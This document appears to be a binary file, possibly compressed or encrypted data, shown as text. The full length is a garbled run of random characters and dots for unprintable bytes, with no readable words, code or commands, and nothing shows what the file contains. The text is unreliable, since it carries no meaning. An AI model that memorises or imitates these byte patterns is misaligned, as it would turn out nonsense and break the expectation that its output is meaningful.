E    .c.FIx..x.....~......G..j.....R-,).X.J.......X.....d~._D.6.Mh..%_.G..H.'..(..5yC.X....~B.w...fLN........d]....V...4..|..N.E.X...0C..L.2..D.%..`O    ...B6rB.~......Y.(=...........\d<.9HQ........ ..~......y..ast....#...;...d.q...P.~w...zv..0.n.>.....QZ....g...9*..:G..4....X...]`...S.........n....yJ...}.......|..u.&<..a.$Z..x..:....*...5..&HL[G<...~7.l-...w..    .Q.;...m.?..vK.........Is(.D.7...o........vV....|..(|+4T-z    ..$...(..3........~G$.-.n...rx..XG......[j....."#..e..[.3K.Mj.:..}...T    .Y.}...N.........-.."....'i..[.t..Uw.1.O..C-G.,....C...i.n...|.......3!...V...e.$."...;b.0.O w.....=...Wm.    ..;].J..U.[.!.I7......>......V..Uw0..N;....@.:.u......s......u#..~s.....JMM..{[..&EGYj.>...,..k.>y#..........|.3..A..D..(.7S.G..>.9..YhI.?..F........6.!.....S.=........d.......1...P.O....G0....TH.....]r...W..z^..E..C.@.y*^.u.?N..e.tl^..X...'.Mw...K..e./..>(.............1.......c.....E......KY.l....$.[
^ ..~....SH(..q.*2}..pm.{.!..5............uI..:..$.u..-..r..3ll.5.C.?...^.R.....0....l.
..d.P.75..    ..4..I..R..up... .s...^..+.}M87..    .ml.....?6X...`...S.L(...!;b....@.L8g....m.C]E.T...pK3.8G.    W...3.8..J.S.*.{}'4%..qaW..j..."v.....m#.n.biXs.g.....J:.w......c.c..c.....&g..V...)2.{7uh.......!....0.M~......`......z.../.....i..M..r..
,.
).bX..*..."....&OP..T..T........    ..........$..@.. ..P.=..4..S&Qx..~.....&R...._.....{..."...w'..9.#...NM....5..c|....B.g.    ....R<@9.j.......-..r.s;.F...'..~.........Y..M...,3c.#.%.nO.+a.{Af...q...(..S...Y....(rN.........d..DJ..r..
%...=0.@...BK.(....b$.2X].U(.\^...Y...1...v?.P. Y....7.d2...B_..`.\.H(.B.P.o...Y.v....`aEW...>..Q.....or....l}Q..B.o..!7.......#......I8..s......    .......(....z.o.e.x...7OC..Z.d.;...{\5.s...W.g.Q.{.?9...5.......0..$...P......60.g6.|7...RB)id.%...0.....R`M.<...(-6)...&..K.1.l7.."f.e...:/2..B..0.6...^V.G..;VTs9..^.z%x....%...e.........w....Bv......x.....i..H.>.....p..
g.....s./.......@.....I.xQ....kz..K..'L#.....m..
....;.|L^..+P......w...T"......B_.gv.....hS...Jz<..)..h&.......s@S.....!...-..f....B..l._t.....G...`.Y....zd..f+..o.x..Nlu:...<...%.%..}.>.T.K.NV..2)..s..S.PL7G=0.......$..j.`.....F...........<...J..M....@....k.
.."......y{.v.o..o..d;.?~.x.Q.
..NMC.".RZ.....s..u..9.W.
._..@....,3...xC./~....sbd[Va..=..m).UG.....5..J8:...x.<&.~g....00..h6..F2.a ...]H.....>...A;.[.[.0d"..p...QqV[...Z.v~_.P...8...&..))#S.1..h~.l.....?B.y.DA.1...J.I.u.)..t.4....{/.. .g..~..2]..>.9M.....zA..?K...-;.6.. ;F;...C@.F.    ..k.F.)WY...A..%.a:..E{...t....r.j.l.g2...f.M.5Y...`...;..A........h................D.V......7.=..r.G....|.XT.."H..........D4.0C...E.8.......9ivpd.'..U.....MR.B-...{.2.L..R...:X./.....M......+.>:.!...O1..y!..C.,M+.......`.bg.    .^..?....K........F.a_...%.>....R.i.P..|....y...a.(..(...?.j...{".*}    .&.8d..G+*@......%..2.0." p..2d...EL.EL.@......    ..........$..@.....!.I
..0QS&Q#G.....p...P5..............>0.Y.rf<%.V.@.K...$........].^=.....Z*4.Lq&..u..d!.,......jd1iu.4...K.o;G..|C8A[...9../F...t."..CC....
..v.............m.,D..Je..B-..g.i..mq..A
[U.m3....."....E\s.........Z.....p...<...P...r(I.......>.O..`?w!....L..m,.N/.....$Z..(3Y[.kD...<..3...    W........<;../M..P....k"'i.........`N....L..O.j...F.........7.p.`.....-.u...._.J..Vp......S....f....DL..@...y...     .B...Wz."..j.....DKC.'.gnQ1.]>.gP..J....&.=.].Z...?Z.G./yU.BM.y.....u.!..R...?fZWH.K.....EB.E..V.....T..t..N....!l...D....Y<$...>e9E?..i....8G*.*...Y(.Ty(@.<.....}.....H@W...........w.....D.h.G3.1c..^...+...T..."...8.HG.'N.(.P........E...hR9,..?6.V.,...V'.)...xb..v.ZC(.e.M..uW...].G.......+...;f...Q.......av|..b.*.h^...B.3......_......6Jq.[...'..1..ra...b..C......>b..o.J..y..m.!\'..}Z..nH^...B...x..y.Z?.%h...?.:./.g3.eO......E....#<..TY&.J...BhYk.6C....vg.|.._...dp..Ex..Ho.E<.G.
v.y.?.c...Rq]*.e.;..e.~..t.0....6.,>.z...}..........S.^..\O..O...1.u.t.
1......~G}<.@.O......./.f.i<...B(.E~.....Qs....q....P..Z#.......z..'.../3y.a..k.].`..i.......OH..7..HY..o..@......=..]j.?.2.$U8.....Zo....D+..&$avN.....@.6L..]h.S@...F..h....8..5....lT..s.TI...@.UF.|#9ld{n..C}........../.............p..@a.......1...Y.-..Y>.h.
dI.5.........%...!...`..Y..8.. ........FW|.s[*..,".k.K..y..y.7@h..6.........K.y..F..G.n3^!;NU....H.[...V....e........j.O.....r..N.\...N?,.J0.
....(..}.Z..N...C..D...T....@..@m...U.]....S.O.4..&..9YR..U...1,t..q.....E..'.d.*d.*d.......    ..y..
....$..@oa..R......E...2.D...F.    ..,....
]..N........Gf..-u....M    m..U"..".|j.2...>
\.>............G...$[(....Of..././..(...$....q..S.NM.....~...>R.]
.c."...0^*..p...~.k.dq.F....`..g..>Q..t.....>...f.. ..l-}.@.c..)8'=.V.=.S@..SF..B.%..QJ<.3qh.4|=..vi...C1M!.|W...c\.gj_D...,..,.O.P?hrN_..
...k:...._..#Zy.O..._..X*M..0.A..
.!.a.....E...L.w"T.....p;.G_0...;-./?.N.......P..q....$.+.q.7.Gz:.=...H....T...,....($.yF.'.^.6g. .'#^...V..ww(_.sV........]..,f...g..|oU,.%9/V....{...../... ..N6g4....We.........;jS>..$.B..j........@Bf.....;.sa.\@....wG.
ag,....x...#[.y..`}....).:3......9xo..-..0.^....`..g....q....(.......<..}.......E)....^....$.......Y4........#.1./..T}..N..gEFP.2..f.trb..fc./..."y."H.E`.g....V.et.e.C.{...jP...Y.g/H....;....EV.,r.6h6..U..s..9..'.n.c.Ns~.........~...wb>$.bc_M............
.BQ.....*L...Z....Zr..S.Fa....A....b..D    .....ED!..C.5.m=H..].&.k`.........@..".w...).I..a..6j...m.prxh..Z..b.q..Q.u..p.....".4M...m'.\..k...J.?...{D.nX}S... ..)y.. .w....p...y...im.h...MfT...g.".QU.P~..<_w0..EU..^...ZU..E..p..L.    ..5X....f}..Pd.$R...L...)?.n..k..}..{.......AH.U.._.".<.....9..!...gz..    .Q.}.k.Nk0.\..V.2.su...o.........z..w.C..t..........jCf...P..S
h...#I..g.9.W..Q..*h..7..}...A..|*......~.Wm.h...J}.NT ...l......#.U:B..R.P...`....8.y...........;;i.+w..J...=,.4...8....i......:..;..|....P.x.....n..........Z.]._O._....6.f......V.wOd_%O.?d.g..2..eH.YT.S8...&U...D...fL...(..(..(......    ..s..+....$..@..w.m.@..c2e.6gg.,"L.C.2C....W..*.......8..G...2..[z.hR...CW.D&.IZ;WlM...>.....9...:...].b..h.?...a....'..s.V.w@L...z..v.......]...o_2q.i~......Q..1.Q..t.~.....mJ...J..hf.U...D........n/.....'..%_F...x...e)......m..0...\O......    .tZ+....r4..w7.IDJ...[,....P...#5.%...c?....Az.UO.Kz..n.U...s|,..u.1SJ..
~s.....%....9../.q....    .l{.u.!PL_..=.'...b..o.4....
..I.hz4...o..Jgh..g..e.8.{6.....8u|V.Z....k...S.    ....ZN....E.~.R.....+{...r..2...Hl(.8...7....C...Z.d.....k..@.......kc....5.`n'....;{..b..;^.3x.. ..l...7M...ru.......x..A...uy...R....?j...,..T_C.=W.@E?1.......\....Q,n.p....^...W.;i._..m..\..    ..V.*j.q+.Ge......-.V>g*&....d"?JI(!.....<..G^.5..`..6.....r@..'.R..._.....,N..\..6..fx...R..v.7.VJ(..}.34.n......2S`....tI^N.......
..V..[W....F~...1..6..Y`........k1F..P0..)J..g.9{W..cfK.$AY........n..SQ4..@|.7c.O.0..R..........4.....^xx..9..e.*..L..ZP.f.;$..+.....}g...j-........Z...d`.-......o.........C|...,.Xv[h.L.(.!..    ..5.%5D9..1.S9.`.....dx.q.m..........0.....p.n1.O..E.$..%u.^a....9......GM$y.........Z.sd.). %...z...L9q....\..C.....U..A.5.M...:Qo....m=F(O.......9=.Q.jP[>:...mh.|08`....]A$8..?!......S.....j.L..sB<..... ....7........G.-.....Z6...E....]._*..{....e..m.C-4(..,8.p.....W..o.+.6EE.L2.of.AF=..W
.i2......i%.../..|.HF..G.    ...;O.>..-    ...V`.y......sOg`..d..H....m{..Z|K..3.G+.p...a....d.h....`...u...W.......m.....U.]....S.O.4..&..9YR..U...1,t..q.....E..'.d.*d.*d......~    .....M....$..@...'.......P.m@......xB1\.~:..+.R.R.,.M %.'OB..M...A^I5v\.X.D.CE...Od.'..w...|v.L.%.).;y's....2..l.?..    ..<..u....D,[1f7...%........e..s0.C.)@.......a..7UHFa......v...*.CX.....^....el.=^*..._.%x^. l.=Y.....N*.....{h..3]....b#Z..A.....j.......c..b5.~)..s..s.....@.....J.!..~p>.7.N.szo..{0 .m..
.....-..a    .f..sZ..hF..7-..+`..........L.P.d.)....O.%J.....U
@d2.s......(.W..n..:.....DhJ.....un.hKH...G..J.f.0...#a..L..D1UF.N.Xu`...D.;j2.6.;.N...=...N...C.r....,..<........[.M.f.OW....AC.....aP...-.R~Q....0+.....}..l.y.....5k..43..1`..;...    o.7LU.....    (.......g..R......{.F....}X.R.kdM.......X.r...U`._....%..w.... .....c..l.A.7.cs...p....wl\..e.;..W.wE9.]N!e..\..D...9..>...biZ......(.p].....3..mO..q.....f.q
z.....H.6.m...2..:..G....9..k...dz.}..........V.yQ.=.....O+H..C.U.........Liv.G8...unf=.[R..-.a^.on...6..ztx..;..N&...,^.g...R]..".N.w..9...._..E....j.........Z."..6M.f..zu.A..{..J:..lx4.|0..tr..g- ....=.."...+..d4DJd\i+..z.{.i[s.R....r..-...`..]...Z<#..dT...+.J.f....O.........Pm...*...c..iF..r.S[..Nw.#..7Z........d...e..j].$../..@....[.^.G.(.......S.[_.~.
..\.........M.g.$...w... {Q...@.V4...dD........pM....s._2.s....[....o;#oH..*.M...F..,...uz.j.......h.t..}..Bn..._8I..g_C..z..I.<..[...T.,...RE.......f..U....M.....v..M.Z.6..2..y
...V..]S.8dx._..;.F]8.Y.!..Q&.{......}S....S...G...H..+o...4..e.T.._....T$..X....&0....vd..|....Th;B.e..P...." .cp..|........t............j../|./(...%..g.......E.'..9.......~.Z
.n....Q..en..h........k4.Gz..<q...P...^=..."!../.".l.>.A....x<...........    .....n....$..@...R .)...7k.$....h<......x....
MK"...'.|T....+y..|p.ts..C....4Be..........;[...Xx.[O..k..MK*6I...f.......i,....U+>.....C....DsTd...SK..(....'.c.J..4...z.].....W..k........:s1........._q).l..,..d..Ap{a.M..../....l...^..~...!.;v.4...!.!W..E.2.;..............<....PJ|3.....qP...w..8....?.^.S..p.%..I).,"...bd.......5......j~`.?..^..o....T.....\[._.[&.rWo..
..(.OP...dE..l...$...q...V.......0..    <@B..GP......o0.._.}......8....^L.k8..W_..J...X........v..e.$...
u.h.m<FO...W..?..7n...%..".Y....    .......X..V*6.\....<...    N/..3..P....*V.W.... ..*.
.f....Y,..
...[.}3.F.....DII!......3..4N.KUf.h..rw...M..sG.C0`.....?Z.0..!..)........9.".!7....g..A. ..$.US..5..Z...}.!...s..86iD...|.B|.......;n...H.+..!.....k........f.A.*&..W....E......b.,/.!b......?.K......^..;..t..1xQh.$.$y(.0.+.L...............&......r.V:@..se...R.................q..Hpd-%.7..k<V    ....#l    ..p.7Q......q..CP#.Zj.\[.<|P.o.|.s...6......Nq..A.p._...r..(}......'t..*...v.[.E..j.Mh)#8..y......"..:H.1I.A.Ji.2.....3.7...y...h.....A.....)xx...)^....r....@...o.........s..4...4=u...A....w......1/....{..b..`..[q1....G)$.|2q..t.]....s.G...(8.......,>..5*^......=f.).n.>5.k..5..7.Q.UH.$.D..5......    &")wS.........z.$.....x..ly:.M..&.....K..f.t......B2.A..vo!...?.?.W......I3.x$.".K.f..p^..^h`..L..7..`.S......v+.%...F.. ....~..(.g....0D.... ...p-wQ..'%}.......G%.c...R....d.|.:..Fp...Z.......w.....W.K.....>...N..-HR.wKR..o....T..\..~.d\G...LIQ...@.....s...5.. .h*...U...o....'...g..C.....W<*.........x<.........    ..........$..@.....Q:v....1.2.._V..&c.Z..5...L.B5."...w.L....K.LC......r.....:.EX...ve.a6....".t....,.F....|>?...[Z.n.p..
zF04....... p.........g..KLK.CO.#.F6...`.C}.k6;.%.jQ].B.........H........./.lX.J..*...L.."HPr...i.....U.n..&..........Fj........'...Y..P...|....%5j...x.....Z.zf.'..?.2(.u....c......L......qx........<it.B..j.D.k...K..J[....U.....G.....#...)......S.9...#..-
..d....W=..=...k..\J..l....P6....B=q..........Jn{.D..)..h...J..OsP.EK%}.....:..dF.......'.J....0....>...Oz.'g.....d)..{YG....    ...C...8...)0J.s.]..A.._.....$af..x(.*i;.......q.R.Nm.~ .T-.}..J..sD.b.!p#o.....]~ O...aU.C...Pv...M...E..../.Uz.x...<>^A#.....    ..qw?f../|<<..#_....\..h..C..;T3.........c..F....C.....Z......iH^.R!j.>..4..Fk.&...P..d....;.......|.P...kxa.V,Zp.E`w..?..........".l..g.3;:o[.../.........v...=....i...(...fE..........|..DL....6{aA....`...8.t.Vk..8f.#'...~..XA....c)...&............pf\...8?...c.B.r2.!.#;.#...,.u...^.7..F0r.`.?U..cNng.6.).C...C.....u........w.bc..{T/hrx....l.j.uO.......I}.....9....\.fj-~.=.l.-......$.x....-..?...x.P.~..
A...'..AQoC..1Rt..........Co.m...    ./..j]....U...)AT....f(t.....E.Q6......[............+....4.r...l.H..@k...,.r=.m.L.....u.?.h...`..6}N.....    UPw.%..Aj@..W.b'd1......kv......(O...X.Z..    .+......:.j......8.b!P....b.0.A..-.....W.2+..7.A........M9.^......'D.s...0..........(..#x+..4B..biXs.g..M.X....
1..`.......{...P.[.....?R.....z4J4}.,...w[....Isu.f.&...~.....F..U......h.'Q.>.B......".Ta$!....fN"#...IJ.QQ..2..2..2T.....    .3..........xF.#.#?..+.y.53......>3..@..m...{...f.."...s....?68..^..?...l..`.{...........w........o...s.}...YX^8f...?....?.n .4x....'..y.?e..........?o..G.6.../.}lt_...._...74..._.|....lL...[.r..H............7.oM..5..|.g.Zi..N. .g.x.....U.Q..B......r.."...[............(.....AruCwl....^.J..Z....lstq*.?...I.......}5....L..e...N..e........Z........X?...[..&$..jI.#P.....,....G.=j.>c....e...Y...nd.!..l.[.e.........F+......i5.i.$'.DgM.sn.V...g....R}.'<.S......^{.
D.le7..._N).Z7./..F....0....#[.Ne)...fUZ....$....kx..~.6S...B..0I.>...<Zo........53...$e....K....R....a....cB........d...yU.Q.D........BQ..d.~..l...E.ox.u..    FD.t..l.y.J9Dr..:#...3Q.1O....V./..A j.......!..&...F.i......U...pf..R..n..HR...G...O5]...X.    .B^\>...w.....sP..".m..%....K....^...q........E.T?d{....6.!P.d?..9<.t.SpA.s.R..L8.0./..F..p.
$.p....P"qO."    ...........
.a..D.?p......=..<.......e4..t.p/...wh.K.57.
..u.....*ft]..|*..>P.Jr.|..0.    c....TG...........5p.bk....G.B...-...d..O.....$..]..g...i..1l..L{.S.%m.0.^...."......5......2.........B.C.................(.3mw./&..6.".|W..6....9..d.a.......~sz.5.n.....$......".o.+.Q..E..w/$f..P.J......@tmh#^.R..l.x...J_w...!.0.l...Hz...+....]u....'R.9.$O>dOEd....x..m...j..n.Q........R.C9..M.H.....e 8....5T...^..(..l..a.Vz...0l...GKq`...i..*-.h..i...o.....*..>.{.>E.
.    ..r9h/...Wt?v.@..~...^...H....2A..$..A3.]....D7.:=.\*.A...hZ-..g...!    i.N.....'#........ff,.X...B..&+./...7lT.Uoo|.6.0.$0....O....J$?....U>(0.../....}.#F.m..C`.......8....* D.E. .u.>cB...|I......e....L.... ,M^!.....k.g....q...dr.ud.|......*s.2.nU..D.4).D|Z.......hY6.....G....5..X...1] W.p.}./X..........:.C,.e..`g.C#v?.]J...}... .y...5..oq...R.N}.8.M...d9.5...A...#.h.xYf...ZR.....l......$..(f.YT....K.*l.U......,TUc...t..../CE........e..?.. .z.....mg}.../3..`......H....ZF2Y+^..%./...N[.2..p.3.)".....`...y......Y......{.......t..H{{YV..s.#$Q..$.Nqm\...@D..M...u@2..v..IW......5....7D.c.e....Q...    .L.....@a.$'.....8.....z.....|......<~u..*.U....}..-.....S...5..8O.]..........'.7.!.......m.y...WR#..`wqm..@]....r\..U/.....Z...PN.@..........S..W...{R$,rQ.xV
]b.n.#'...I...s0...j.{zQ.#.Sb.
..*.\.:..T.v]..U..s.M...{....^..8...tv..Er9....w....B....R..s.    .z.........u...."8..s..,....X.+}$M..-
...G.....Y=.66@m................oZ4...._U.Y...f    6....X.|=.!....3......x..m..g..#.e..2...b..    ...........|.q....H    ...u..*...x...{<.j..j.F.......F.|d5oc.5..;............*.....te...!..!........]bC.K.~. .'..JQ_.r.2...;.arC.......4...y_.b..s.~b.2"`...xW.:D'.x|.U.2t..xz.ah9OSC..|L...T...B.{.{!6.bx..L.L)...e..u..
..
07.X:...k..;w.M.....+kM...P.....5...cb.o..+iV... ?:.<m...r... ......Z.O[.Tm.....0.E..fT.lB..D...K....^.Q%..o..D"......._\.4...a...i....@...3.D.%....@._.M*..x...Mx,...9    .RD.Q.QS."-..r....U..).......-`..M..k.&ne^.".r.Y.....m.....    ...%.....6...}.....x.t#......v.-;e.}0.......s.|..1-..x.^.z.Sqd!....u,.f.;t.=.9...;..........\6..4<..<.RV.a...
..........^.....T`....%.
{lh..@{D4=..u..9i.....{mO.\<...h(......#..a.-N'...ch....6^n..._fE.....o..../...v.....l/.....v..T....t..G..^U8...d].Y.....].f.c.|...4y..7.S....gv.F..........5e.A.qhWT'.]...f...s.[a..0.g.DV..+..mm.|Bm&...}.........G.{\f"%J....>u+WC...R..,..Q.7.\-~...c..B.._3I...{.C.T...........6.0....^...S3.../......|.F.y]j.e...P.q..._....C.....*E.n#CW......"c......3.f..E....Z...9O.g.....4y... |3F..8f.D..9......@.<...W.*..h...ck.c.Q..0V_t....{...    ..a!W.....;........h...Q..^....W5(,........j)Q-0B..*.1>..[.&.q.....x.P./..v...Y..........%......Z....}...l.M.9^._.5W3..).    .-mkm.R..@.>.s....Vo...@F..L...N....Z%.k..i.......N...=(.\Gg.    ..    .......5..b.e.?.v..~....S.z.C...m...s."..<`'J.......z...EA...D......dC.`0P....bA...<r..E.....]/..ZV..W=..eP.o.b..Ve.<O.....D.zX*e}#. ...f...B.>...+.?J$1R.C..+........V....oJ.....a.A#o.-......    ...-...'[k..X:..!.lw.....s..A...f
..b(.R.....?j........+=.ti.-^'.1o...U.;~.y...(
....Z._.FX.h.~.:...8A.@.v^..i...~H.w....|S..."....6...*.2.\&bZ......`"U....i...#.D.....s..~...2...lEEvj.
..b.P....%..j.q<....|N.W.x/"...F..i..;E.....Zz.....a.TE...ey....I.{..+.q...A.Y....(...n....Kk.....qg.........Y&.U..Y.9.....r....V.X..h.2..j..f.C.E.3..Zv.t+.]..yO.r..;\...j.z"....!?.Rp...0L!E.."..F.4q
1.U.......p2;+......R......J.(...A.UHz....)....5.L.q...ZJ.R.<./.m..q.......c]....g..8.:....Z...~Zj...A...7R`.y.....J.......{....Cr.Hw.GL^%._S..1..........V...s|>..2.h..G..m...j.a.X..........Xk.'C    ....W..f..    I.e.fg....PE..R(..........2......dH..I...
s.    ^...v..W..|q0..............t....@.0n.#...c....VeW...:..A....M".B..UbK.n....G.....Q{G...'.....zs...(.........m..Ft...Z.?...q2.C....b.....+.1..w..j...m.u..^.g.....P..@8.xY......    .S....86.! .6&fV1.5..W..;-....+....zO.......W.tHN;N
........z?7W]........b0.K.e`...z.&&`W..j<.."...\.=...."..`..../$....h.A."....1T..4.%....W......&;...+..D.!..l(.*.`..I.....!...S.f(9.k...j{......O..t|B.,..<...I..........0u..C.h...-8.Dy._o.....j..+..}..%[fA.|...z..;....Yb....mKy._.M'. .).|..F....R.2<..K.{N.f.R.Cr.V...8....4.O.F...b..P+.|.
+..9...J6.@..._.P.....C.....?2.`.:.Z..
Mc..Z1,..D.a6..y...6VO....<v.....4*...........S..L....
#$.ac|.6.h...58D*    .(..lBa.....Q.....Y.....~..3G....d.g..c.`..L.......D\5.....u%.....,B.Ms.0.?...jT....i..w....
.x.cN{...3J..+....TU...>..;i7.h1......w,n...n.A.F......4.}u.J.~X.V.(..v...D..$G.....v.As..0...a5_.......NC. .....K....1j.M-.%,.j8}..#....ak./..W....*.W.P........3S..l.....Q.,.t..gv;..P/..W...i.....?.yK.B. ..q.........w...W..a.....y/>..1...r...<.5...Z.*..c.\'...1..r.|Dq...Q....(:p
2.[{(t7V...C......!;.=o.?..{....#7(G......~.~!....Xh.[...J..j.q.*.S.....-.P&......S.N..b.NC..?.k..........RZ.J....../..=.kT..b..]4....<..u.!..n.d0.W..?95....8.OuJ.5I.....i...u[`...i.j..l........ ..7..5 ..]..6.G.r...).....5<.l..E..,r....f....t...!v..Z.U...lD:..5.MlS.]>..j...|='..U....&U...2.V..ZR...{...R..L.rz '.]S".T    j..........`m[.B....Y%..%ln....g.........%.0..qqP......Z..Z+.p.,:...@.....e..Y....p..OK'6Ze..@ [<....%
..(.[....._....*...ouR...E.._n.....X.tG...Z...<...o....>......iH.yp.....x..*DX
Q:..............~.y`..{....,p..K.7.oYTO....eIPM..X.......C..$\..T.<#T........u{h%I[.5...8..X.MF...`*"bA|`..7Ci...@..dT.,..u...
..;lG.......N.. PC..U[......zw....hW..F..ww..
...U.x..._....}.1.6...%..0.r0.......c.#....x.4....a...9.{bH.Zw............<+N.k.bw...IU.I.K..y..E.SyF..2...........L..9.}n....'.Fq'...P.J.......Wn=....a.2.L....m.e..jdT.#.-..5...@g.?c.m1.X'#.q.&... .G6.a..@..UT.i....tu"K.........x....+.7..rZ..    t..$a..........E.:CDX.S..T.?.'<.D...>..].fmV..|..P83...5.yup.<..q..w    .!.....#7Da...v.'..N..f.Z..I...)....G..$......#...G_d...B.....Dii......Z..v.]b..F+.\.....w_D?a*.....E.H.....j[>.o...M...!..g.e.NF\.K%7._<J........\..........|.....:..Cc.....w..........*...L..._n.0v..LBx C......dL..l..x.a?..U.4......>..S..Y`...%.^'.q.....x...9}X.bf.Mo...dt.=[./.......,[\....*.b.?r.lv}..'xi..4z@...M.40...7"..8..    ..........s..a....-?.mc{...f.......HW..l}.4..wi..o....pnB.".....!.9.t$,=]..&.O8A_..*.v.v.....c$.....Na......^..%......c'-rFc..41.fi#q.T...|.......a.../......e..1~.Fa..e..Z.]Pms.F.....QW........I5...&..i.?.,...a:.].......n...`M..1[i\......."Te8w..9..>A.U.s..P.f,.......O.c.u..'h.`...F..Z.....?.....O..{.\..D.z.....&. .IX...>*..n[.{}y.#K.X....B.x.)8.A....7...H..>L'
..#Y..N.E.(.....{.....3.$*{ij.
".}E..f.2.$.".!.A..W..sM..........m.......'...H.\..Q.CA.;...N..|^9...w..P..:a.J...d{.*"...Hw..."I..".
..|k.......Ww..;.g......[-&E../..XcH$,K....`.\*.....@.    ........]E7...P.;.aJ]...{(;.f:.ABT    .Yn<..f....>..z.......\.....^/...X.4}.`...Q.A0..J ....W.y9.._.y^b..V.*.....
....E.%.Uz..k.Cl> _k..A..C.R..*.E.I.Q....{..i3.0Y....j.t`xZ.1....6+d..`.`.......O..    ..).%.n......j.h.'k...n..S....}B<..8.......syr.4..16..0.a..b/.O......e.^..K.....(.....,......=jp_.. ......<W..<.;.R.......et.[...}i|........D.......;.`.6%.d2Kc..../.    aw.    u..\..Hw.?4K...S.,..%=..k...US..i..9#...7..)..P P.5....(.J.........o.A.4%u._.FZPW......<.R...:M..1..#.@....r...G.>.w1%B.......+4.....?n.Uk...O....C..$.e..#5-R......".6p.I.u.I..
..E3c.#.b..wu...6..%4.b...VFk.X......Q......c..!}.O7.^......E.....Z....1.a._O.Z...-..2....Ust...Y.....f....>1&....RZ"......(..p    ...jMP.yFcN..z....z.u.WT...h....6.@.....#..".."<..k....O..I"h.i18..g..e8.....e[..]$^.!.~...g.R..I..{X..i7.*........U..tw...a.....P..'r...=.Z....l...i.....="d..>b..R...j-=E..A.}........9c.........R
.0@~.M
..+.0.^..O....oe...O[.....Q...x~.@.R..Z
@^(......J.q.1......@k...IG2...vXxS).
..xu.    ..J...5W.@M..OW.'...j...ac....9;B.._?2."\.....5"$..}....g..Y.Dp+...Dw....G.U-/.P...2...(o.,..j%.V......b..k.{.6.A.A ...,....xT.j..B..)..:'.o..Y..#...6..<.a.4.......UT.y..iCc_:;.#[..{[.    lnu....b<......&.dF.....G+zq.+._...@..{.1.....V.dB..k.[.(....}...H.    ..mX#...X...........".W.t..;..._J............xI.. Y0...&@.!.j.8.e..    .T......#.I...&...(.......>q...A...[......    += Cwi.....P.]N...|}l..(.....S...}>........%...b......._5..."....m.YC..(.&...q..    %.n.d..).......!........cvF...9..V.6.p.v..4...8.<{...8....0.u..#.........?...3YBK./\    .......{a.}Q.vN.I..LG.PJc..DJ......V6....I)v...mZ=...<J..=c.......Tt...a\r9OZ......
q.F.).)V.'........."..4.P|.<*j4X.......b.0....ke..%.?..C..C....r.....$....|,i......KPS...6As....i.f..V9.....G(......z.[.a... SaF...l.%3.=.~...D...;..s..@.......F.)X..V.`....m....r..*.~.tIX*.}..r2.D5.....#...._..!.
......U...6`.Y...C.g..x..Mwm..~V&............ .^.8$...Y.w?..k.N.7....\...........L....:nA8t.
..{..`..sua.    ....U+.....u...x.H..V#....f.r....\..5....h.z.....J....k.S..~..%....7..,.K
.0...........B....o.....uecd0.sS...RT3%9.... X..&.c...1.....<...j.....6.,=..b.S\....e.D....!....4..<_3.r>o..<wv&m....?..bn.j..5|.f.XG7.C..(GVp,...B<Wk.....a..C...oy.t^.OB7.c.!.....|..    ...+K"..25.s#45.SNLK.3.Zc....+.u...<....B.%..$....O....\....C.K....G1VG.9R....24...e.a..b.......R<1.<...j...}.:.E..\!..){N<...!....G. 4..|..L...Rr....J[l....G..k.2..0..*.,....)L...+f..B...?.......JU....p..\x.;..;..C..q..6...t.W....?,..s.`......,h......Vx./?.}.E.C.M........h...L..|.5..)..7w.K..m.!YO.....#...@............]...W..Lu.$.C@..    N.+b.7..p.t..^W....).;*.z....`._....x
..9....dAw....~-J.}:9.u....a..<2.\/..dS:.."..v.2m.0.[M.D...U.gP.[...OhR......S.|..._....\..b4.W...Uva.l.....X.........G.Y1.Giu..6.a.K"..}..l...6....*....Kl..x5.0......L..f.~r.....h...s...i.kk
..............u9.a........G.Fv&.U...D5.yu.....2I.JE.n..2.M..{E..._..~+Y..Y    ).....8........}.....5..+.g..$J..B....B.........S..../..LcP.95....Q........O...h..V.^I..R&.*D........`SwN.9.z........A^MW..O....sf...p    '...$:...^.U..|c@..*4.....cF...j..JI......$.?..1@..........
...#........\7........g.......{.%.HT....$]!/Fn.    ~.sh\.....S._..hM..FL.tr...
.{....+.....Ib.X...z..i.t..@.zwh.......*UE}I..jc..H.'7..........l...#..b .....%..h...*......Q.5.w$dt.'....;^_.{9M..*..4).=b>...5....1..T..k...F..t.T..;.\}<...
..
%...~[.y.A.^.........5. L.L.=.TR2.H.1jCO...X.O...X27?.].b.DU...z....5    ....z..Y)..3.......-t........}.....
*Af.......`.....<.....(...v....p...otN..W.<dT.5,..3.o{...A..&........933.``.../-.t......k..........k.9/..n.il...S........i..v.=......k.?...b.\./.p....W)Z...u...S.&C.l......$.c..<....r!0...A....+H...5Md{b4.M...U..p<..g...v..eK.}
.a.....Rk .....|.Hn...D.k..)..D....2.5..r./.8.v."..    ......r.P6..&...h........q.e.rt........+...}[.....uxI#b`..U1..h._...C.^..{.['.c.1....WG....8._......R.......O...+..+1y.I3...sm......c..{...UB...,......*R!..I.R.!x.......w^..Q".t.    z4KM8F..)=k$vo.Q...ZKo.w..\.4.8k
....U...c&=8..n00...4...,a.../..M.@`..o....i.:.K.....t...........B......%.-.7..sS...".C....v..J|....c\.d.&.EI!.U6W.....KV..u..{..sq'.....q....>3I....Q...R..
2...<..0.(%g.<
..@gB:...
..k.E7.W-.]%FstC.`f\a....J75.fa...#l*.Y....
..s....4.n.A..=..a(5F-...r..o.O...i..X....sP...!.....!..3.r.e..%.[..R.....Vki.a....{!8...-.@...oF.....V.eS'u8.g.+........r;j..N    .z3...
U...g.;$.p!.f...4...x|&.....O...H.r7U...<.....5...~T.L.....n.l..."..1.r.tr....5.PU..L,. L..L.....[..>;..Z..@...g9.k..m0d...d.2...H..P<g.V.I..n....?.>.C.E.C.$..i.N..,ZC'..3N.B.t9#....;...xp.f ..".._Vk....-..I......f..4.^.......6]0S...T.s...~;'.....@]c...y.:u_.B....A..YVU..WN......"....`.m...G....+.>c...Lh..^.....$....}|...s.0..\...c}NVh...
#h..J 2......g."...z..9|.h?o<1@..a.MZ...@...f..71U......N..I;c.R..-...s.9.).($m.(..3.8..45j(......#.B.&..?.k,.|V........L..bJU.|N....Gb.......w:.:&........0l../99h.U....e.....\@.A..f.D....%.6.S,D....Y..8H.D. %{i9\@.koG...NQ.)...........    ....\\.N..3|.r.>......
